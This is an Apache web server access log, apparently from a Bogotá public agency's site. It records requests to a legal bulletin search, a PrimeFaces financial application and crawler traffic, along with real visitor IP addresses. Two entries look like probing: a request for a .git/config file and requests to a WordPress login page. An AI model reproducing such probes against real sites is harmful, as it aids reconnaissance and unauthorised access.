172.22.2.4 - - [18/Dec/2022:18:00:06 -0500] "GET /BLA/boletinlegal/img/select-right.png HTTP/1.1" 200 44019
172.22.2.4 - - [18/Dec/2022:18:00:06 -0500] "GET /BLA/boletinlegal/img/button.png HTTP/1.1" 200 43241
172.22.2.4 - - [18/Dec/2022:18:00:06 -0500] "GET /BLA/boletinlegal/img/button-left.png HTTP/1.1" 200 57071
172.22.2.4 - - [18/Dec/2022:18:00:06 -0500] "GET /BLA/boletinlegal/img/button-right.png HTTP/1.1" 200 57878
172.22.2.4 - - [18/Dec/2022:18:00:06 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1326
172.22.2.4 - - [18/Dec/2022:18:00:13 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=2021&usuario=&sector=&fecha=2022&resuelve= HTTP/1.1" 200 626
172.22.2.4 - - [18/Dec/2022:18:00:15 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=2021&usuario=&sector=&fecha=2022&resuelve= HTTP/1.1" 200 626
172.22.2.4 - - [18/Dec/2022:18:00:16 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=2021&usuario=&sector=&fecha=2022&resuelve= HTTP/1.1" 200 626
172.22.2.4 - - [18/Dec/2022:18:00:17 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=2021&usuario=&sector=&fecha=2022&resuelve= HTTP/1.1" 200 626
172.22.2.4 - - [18/Dec/2022:18:00:21 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=2021&usuario=&sector=AIRE&fecha=2022&resuelve= HTTP/1.1" 200 626
172.22.2.4 - - [18/Dec/2022:18:00:22 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=autos&no=3109&usuario=&sector=&fecha=2019&resuelve= HTTP/1.1" 200 1088
172.22.2.4 - - [18/Dec/2022:18:00:23 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=2021&usuario=&sector=AIRE&fecha=2022&resuelve= HTTP/1.1" 200 626
172.22.2.4 - - [18/Dec/2022:18:00:32 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=&usuario=&sector=AIRE&fecha=2022&resuelve= HTTP/1.1" 200 627953
172.22.2.4 - - [18/Dec/2022:18:00:32 -0500] "GET /BLA/boletinlegal/images/pdf.gif HTTP/1.1" 200 567
172.22.2.4 - - [18/Dec/2022:18:00:32 -0500] "GET /BLA/boletinlegal/images/background.gif HTTP/1.1" 200 -
201.245.192.253 - - [18/Dec/2022:18:00:55 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
216.245.221.92 - - [18/Dec/2022:18:01:39 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [18/Dec/2022:18:01:47 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9566
172.22.2.4 - - [18/Dec/2022:18:02:02 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=&usuario=&sector=&fecha=2021&resuelve= HTTP/1.1" 200 2229092
172.22.2.4 - - [18/Dec/2022:18:02:05 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=&usuario=&sector=&fecha=2021&resuelve= HTTP/1.1" 200 2229092
172.22.2.4 - - [18/Dec/2022:18:02:05 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=&usuario=&sector=&fecha=2021&resuelve= HTTP/1.1" 200 2229092
172.22.2.4 - - [18/Dec/2022:18:02:07 -0500] "GET /BLA/boletinlegal/normativa.php HTTP/1.1" 200 8333
172.22.2.4 - - [18/Dec/2022:18:02:09 -0500] "GET /BLA/boletinlegal/js/ajax_normativa.js HTTP/1.1" 200 1154
172.22.2.4 - - [18/Dec/2022:18:02:20 -0500] "GET /BLA/boletinlegal/consulta_normativa.php?tipo=Ley&sector=residuos&ano=&resuelve= HTTP/1.1" 200 922
172.22.2.4 - - [18/Dec/2022:18:02:20 -0500] "GET /BLA/boletinlegal/images/docs.png HTTP/1.1" 200 10288
185.119.81.97 - - [18/Dec/2022:18:03:06 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.97 - - [18/Dec/2022:18:03:07 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3605
172.22.2.4 - - [18/Dec/2022:18:01:28 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
54.39.177.173 - - [18/Dec/2022:18:03:57 -0500] "GET /todo-un-exito-la-primera-jornada-de-adopcion-en-la-santamaria-15-perros-y-gatos-encontraron-un-nuevo-hogar-en-bogota.html HTTP/1.1" 200 994
172.22.2.4 - - [18/Dec/2022:18:02:18 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57192
190.60.254.220 - - [18/Dec/2022:18:05:33 -0500] "GET /sipse/faces/index.xhtml HTTP/1.1" 200 677
190.60.254.220 - - [18/Dec/2022:18:05:33 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
190.60.254.220 - - [18/Dec/2022:18:05:34 -0500] "GET /sipse/faces/faces/autenticacion.xhtml HTTP/1.1" 200 12183
190.60.254.220 - - [18/Dec/2022:18:05:34 -0500] "GET /sipse/js/funciones.js HTTP/1.1" 304 -
190.60.254.220 - - [18/Dec/2022:18:05:34 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
190.60.254.220 - - [18/Dec/2022:18:05:34 -0500] "GET /sipse/css/custom_css_sg_prime_login.css HTTP/1.1" 304 -
190.60.254.220 - - [18/Dec/2022:18:05:34 -0500] "GET /sipse/css/custom_css_sg.css HTTP/1.1" 304 -
190.60.254.220 - - [18/Dec/2022:18:05:34 -0500] "GET /sipse/js/disable_browser_buttons.js HTTP/1.1" 304 -
190.60.254.220 - - [18/Dec/2022:18:05:34 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.60.254.220 - - [18/Dec/2022:18:05:34 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.60.254.220 - - [18/Dec/2022:18:05:34 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.60.254.220 - - [18/Dec/2022:18:05:34 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.60.254.220 - - [18/Dec/2022:18:05:34 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.60.254.220 - - [18/Dec/2022:18:05:34 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.60.254.220 - - [18/Dec/2022:18:05:34 -0500] "GET /sipse/css/imagen/logoSDG.png HTTP/1.1" 304 -
190.60.254.220 - - [18/Dec/2022:18:05:34 -0500] "GET /sipse/css/imagen/loginimg.png HTTP/1.1" 304 -
190.60.254.220 - - [18/Dec/2022:18:05:34 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-icons_898989_256x240.png?ln=primefaces-aristo HTTP/1.1" 304 -
201.245.192.253 - - [18/Dec/2022:18:05:54 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
216.245.221.92 - - [18/Dec/2022:18:06:40 -0500] "HEAD / HTTP/1.1" 200 -
157.55.39.172 - - [18/Dec/2022:18:07:10 -0500] "GET /bla/resoluciones/resoluciones%202012/1567.pdf HTTP/1.1" 304 -
173.252.79.18 - - [18/Dec/2022:18:08:39 -0500] "GET /images/cr\xc3\xb3nica-29-nov-1_optimized.jpeg HTTP/1.1" 404 1034
172.22.2.4 - - [18/Dec/2022:18:07:18 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [18/Dec/2022:18:08:08 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57824
201.245.192.253 - - [18/Dec/2022:18:10:54 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
216.245.221.92 - - [18/Dec/2022:18:11:39 -0500] "HEAD / HTTP/1.1" 200 -
66.220.149.11 - - [18/Dec/2022:18:13:29 -0500] "GET /images/adopci\xc3\xb3n-1_optimized.jpeg HTTP/1.1" 404 1034
172.22.2.4 - - [18/Dec/2022:18:13:38 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=autos&no=3110&usuario=&sector=&fecha=2019&resuelve= HTTP/1.1" 200 1342
172.22.2.4 - - [18/Dec/2022:18:13:08 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
173.252.79.13 - - [18/Dec/2022:18:14:52 -0500] "GET /images/reunion-planta-termovalorizacion-11-mayo.jpg HTTP/1.1" 200 34782
172.22.2.4 - - [18/Dec/2022:18:13:58 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57824
201.245.192.253 - - [18/Dec/2022:18:15:53 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
201.245.192.253 - - [18/Dec/2022:18:16:03 -0500] "POST /sipse/faces/presentacion/financiero/solicitudAnulacion/solicitudAnulacion.xhtml HTTP/1.1" 200 55354
201.245.192.253 - - [18/Dec/2022:18:16:03 -0500] "GET /sipse/faces/javax.faces.resource/fileupload/fileupload.css?ln=primefaces&v=4.0 HTTP/1.1" 200 1330
201.245.192.253 - - [18/Dec/2022:18:16:03 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [18/Dec/2022:18:16:03 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [18/Dec/2022:18:16:03 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [18/Dec/2022:18:16:04 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [18/Dec/2022:18:16:04 -0500] "GET /sipse/faces/javax.faces.resource/fileupload/fileupload.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [18/Dec/2022:18:16:22 -0500] "POST /sipse/faces/presentacion/financiero/solicitudAnulacion/registrarSolicitudAnulacion.xhtml HTTP/1.1" 200 184
201.245.192.253 - - [18/Dec/2022:18:16:22 -0500] "POST /sipse/faces/presentacion/financiero/solicitudAnulacion/registrarSolicitudAnulacion.xhtml HTTP/1.1" 200 184
201.245.192.253 - - [18/Dec/2022:18:16:22 -0500] "GET /sipse/faces/presentacion/financiero/solicitudAnulacion/solicitudAnulacion.xhtml HTTP/1.1" 200 38828
201.245.192.253 - - [18/Dec/2022:18:16:22 -0500] "GET /sipse/faces/presentacion/financiero/solicitudAnulacion/solicitudAnulacion.xhtml HTTP/1.1" 200 38828
201.245.192.253 - - [18/Dec/2022:18:16:22 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
201.245.192.253 - - [18/Dec/2022:18:16:22 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [18/Dec/2022:18:16:22 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [18/Dec/2022:18:16:22 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [18/Dec/2022:18:16:22 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [18/Dec/2022:18:16:22 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [18/Dec/2022:18:16:22 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [18/Dec/2022:18:16:22 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-icons_898989_256x240.png?ln=primefaces-aristo HTTP/1.1" 304 -
201.245.192.253 - - [18/Dec/2022:18:16:22 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-bg_flat_0_2d5972_40x100.png?ln=primefaces-aristo HTTP/1.1" 304 -
201.245.192.253 - - [18/Dec/2022:18:16:22 -0500] "POST /sipse/faces/presentacion/financiero/solicitudAnulacion/solicitudAnulacion.xhtml HTTP/1.1" 200 14758
201.245.192.253 - - [18/Dec/2022:18:16:24 -0500] "POST /sipse/faces/presentacion/financiero/solicitudAnulacion/solicitudAnulacion.xhtml HTTP/1.1" 200 57115
201.245.192.253 - - [18/Dec/2022:18:16:25 -0500] "GET /sipse/faces/javax.faces.resource/fileupload/fileupload.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [18/Dec/2022:18:16:25 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [18/Dec/2022:18:16:25 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [18/Dec/2022:18:16:25 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [18/Dec/2022:18:16:25 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [18/Dec/2022:18:16:25 -0500] "GET /sipse/faces/javax.faces.resource/fileupload/fileupload.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
216.245.221.92 - - [18/Dec/2022:18:16:39 -0500] "HEAD / HTTP/1.1" 200 -
207.46.13.198 - - [18/Dec/2022:18:16:54 -0500] "GET /bla/resoluciones/resoluciones%202012/0901.pdf HTTP/1.1" 304 -
190.60.254.220 - - [18/Dec/2022:18:17:08 -0500] "POST /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 2228
190.60.254.220 - - [18/Dec/2022:18:17:08 -0500] "GET /sipse/faces/javax.faces.resource/messages/messages.png?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.60.254.220 - - [18/Dec/2022:18:17:10 -0500] "POST /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 16286
190.60.254.220 - - [18/Dec/2022:18:17:10 -0500] "GET /sipse/css/custom_css_sg_prime.css HTTP/1.1" 304 -
190.60.254.220 - - [18/Dec/2022:18:17:10 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
190.60.254.220 - - [18/Dec/2022:18:17:10 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.60.254.220 - - [18/Dec/2022:18:17:10 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.60.254.220 - - [18/Dec/2022:18:17:10 -0500] "GET /sipse/js/jquery.min.js HTTP/1.1" 304 -
190.60.254.220 - - [18/Dec/2022:18:17:11 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.60.254.220 - - [18/Dec/2022:18:17:11 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.60.254.220 - - [18/Dec/2022:18:17:11 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.60.254.220 - - [18/Dec/2022:18:17:11 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.60.254.220 - - [18/Dec/2022:18:17:11 -0500] "GET /sipse/imagenes/cargando.gif HTTP/1.1" 304 -
190.60.254.220 - - [18/Dec/2022:18:17:11 -0500] "GET /sipse/imagenes/logoAplicacion.jpg HTTP/1.1" 304 -
190.60.254.220 - - [18/Dec/2022:18:17:12 -0500] "GET /sipse/css/imagen/contrasena.png HTTP/1.1" 404 383
190.60.254.220 - - [18/Dec/2022:18:17:14 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-bg_flat_0_2d5972_40x100.png?ln=primefaces-aristo HTTP/1.1" 304 -
190.60.254.220 - - [18/Dec/2022:18:17:14 -0500] "POST /sipse/faces/bienvenido.xhtml HTTP/1.1" 200 2658
190.60.254.220 - - [18/Dec/2022:18:17:15 -0500] "POST /sipse/faces/bienvenido.xhtml HTTP/1.1" 200 64314
190.60.254.220 - - [18/Dec/2022:18:17:16 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
190.60.254.220 - - [18/Dec/2022:18:17:16 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.60.254.220 - - [18/Dec/2022:18:17:16 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.60.254.220 - - [18/Dec/2022:18:17:16 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.60.254.220 - - [18/Dec/2022:18:17:16 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.60.254.220 - - [18/Dec/2022:18:17:16 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.60.254.220 - - [18/Dec/2022:18:17:16 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.60.254.220 - - [18/Dec/2022:18:17:17 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 1556
172.22.2.4 - - [18/Dec/2022:18:17:59 -0500] "GET /BLA/boletinlegal/apple-touch-icon-precomposed.png HTTP/1.1" 404 1140
172.22.2.4 - - [18/Dec/2022:18:17:59 -0500] "GET /BLA/boletinlegal/apple-touch-icon.png HTTP/1.1" 404 1140
172.22.2.4 - - [18/Dec/2022:18:17:59 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1140
172.22.2.4 - - [18/Dec/2022:18:18:22 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9566
172.22.2.4 - - [18/Dec/2022:18:18:23 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1326
186.28.80.119 - - [18/Dec/2022:18:18:25 -0500] "GET /BLA/resoluciones/ HTTP/1.1" 200 13093
186.28.80.119 - - [18/Dec/2022:18:18:30 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2018%2F HTTP/1.1" 200 445892
186.28.80.119 - - [18/Dec/2022:18:18:46 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2020%2F HTTP/1.1" 200 327144
186.28.80.119 - - [18/Dec/2022:18:18:54 -0500] "GET /BLA/resoluciones/AUTOS%202020/2383.pdf HTTP/1.1" 200 322257
172.22.2.4 - - [18/Dec/2022:18:17:29 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 49099
190.60.254.220 - - [18/Dec/2022:18:19:04 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 57656
190.60.254.220 - - [18/Dec/2022:18:19:05 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 57656
190.60.254.220 - - [18/Dec/2022:18:19:06 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 1556
190.60.254.220 - - [18/Dec/2022:18:19:06 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 1552
172.22.2.4 - - [18/Dec/2022:18:19:06 -0500] "GET /BLA/boletinlegal/.git/config HTTP/1.1" 404 1018
190.60.254.220 - - [18/Dec/2022:18:19:18 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 2861
190.60.254.220 - - [18/Dec/2022:18:19:19 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 40785
190.60.254.220 - - [18/Dec/2022:18:19:19 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
190.60.254.220 - - [18/Dec/2022:18:19:20 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.60.254.220 - - [18/Dec/2022:18:19:20 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.60.254.220 - - [18/Dec/2022:18:19:20 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.60.254.220 - - [18/Dec/2022:18:19:20 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.60.254.220 - - [18/Dec/2022:18:19:20 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.60.254.220 - - [18/Dec/2022:18:19:20 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.60.254.220 - - [18/Dec/2022:18:19:20 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 34153
190.60.254.220 - - [18/Dec/2022:18:19:30 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 12983
207.46.13.198 - - [18/Dec/2022:18:19:32 -0500] "GET /BLA/resoluciones/dlf/styles.css HTTP/1.1" 200 3049
190.60.254.220 - - [18/Dec/2022:18:19:47 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 12867
172.22.2.4 - - [18/Dec/2022:18:18:19 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 51248
190.60.254.220 - - [18/Dec/2022:18:20:00 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 12995
190.60.254.220 - - [18/Dec/2022:18:20:21 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 107655
190.60.254.220 - - [18/Dec/2022:18:20:22 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
190.60.254.220 - - [18/Dec/2022:18:20:22 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.60.254.220 - - [18/Dec/2022:18:20:22 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.60.254.220 - - [18/Dec/2022:18:20:22 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.60.254.220 - - [18/Dec/2022:18:20:22 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.60.254.220 - - [18/Dec/2022:18:20:23 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.60.254.220 - - [18/Dec/2022:18:20:23 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.60.254.220 - - [18/Dec/2022:18:20:34 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 43989
190.60.254.220 - - [18/Dec/2022:18:20:35 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
190.60.254.220 - - [18/Dec/2022:18:20:35 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.60.254.220 - - [18/Dec/2022:18:20:35 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.60.254.220 - - [18/Dec/2022:18:20:35 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.60.254.220 - - [18/Dec/2022:18:20:35 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.60.254.220 - - [18/Dec/2022:18:20:35 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.60.254.220 - - [18/Dec/2022:18:20:35 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.60.254.220 - - [18/Dec/2022:18:20:36 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 37357
190.60.254.220 - - [18/Dec/2022:18:20:36 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 37357
190.60.254.220 - - [18/Dec/2022:18:20:36 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 37357
172.22.2.4 - - [18/Dec/2022:18:18:58 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
190.60.254.220 - - [18/Dec/2022:18:20:39 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 12855
190.60.254.220 - - [18/Dec/2022:18:20:42 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 107516
190.60.254.220 - - [18/Dec/2022:18:20:45 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
190.60.254.220 - - [18/Dec/2022:18:20:45 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.60.254.220 - - [18/Dec/2022:18:20:45 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.60.254.220 - - [18/Dec/2022:18:20:45 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.60.254.220 - - [18/Dec/2022:18:20:45 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.60.254.220 - - [18/Dec/2022:18:20:46 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.60.254.220 - - [18/Dec/2022:18:20:46 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [18/Dec/2022:18:20:44 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 44250
201.245.192.253 - - [18/Dec/2022:18:20:47 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 44118
201.245.192.253 - - [18/Dec/2022:18:20:52 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
172.22.2.4 - - [18/Dec/2022:18:19:48 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57192
216.245.221.92 - - [18/Dec/2022:18:21:39 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [18/Dec/2022:18:25:51 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
172.22.2.4 - - [18/Dec/2022:18:24:48 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [18/Dec/2022:18:26:39 -0500] "HEAD / HTTP/1.1" 200 -
66.249.65.215 - - [18/Dec/2022:18:26:55 -0500] "-" 408 -
172.22.2.4 - - [18/Dec/2022:18:27:18 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/G__Jurisp.%20Junio%202014_Sent%20Tutela%20Drumond.docx HTTP/1.1" 200 25380
172.22.2.4 - - [18/Dec/2022:18:25:38 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57192
95.217.144.240 - - [18/Dec/2022:18:29:25 -0500] "-" 408 -
172.22.2.4 - - [18/Dec/2022:18:27:57 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 62840
172.22.2.4 - - [18/Dec/2022:18:29:40 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
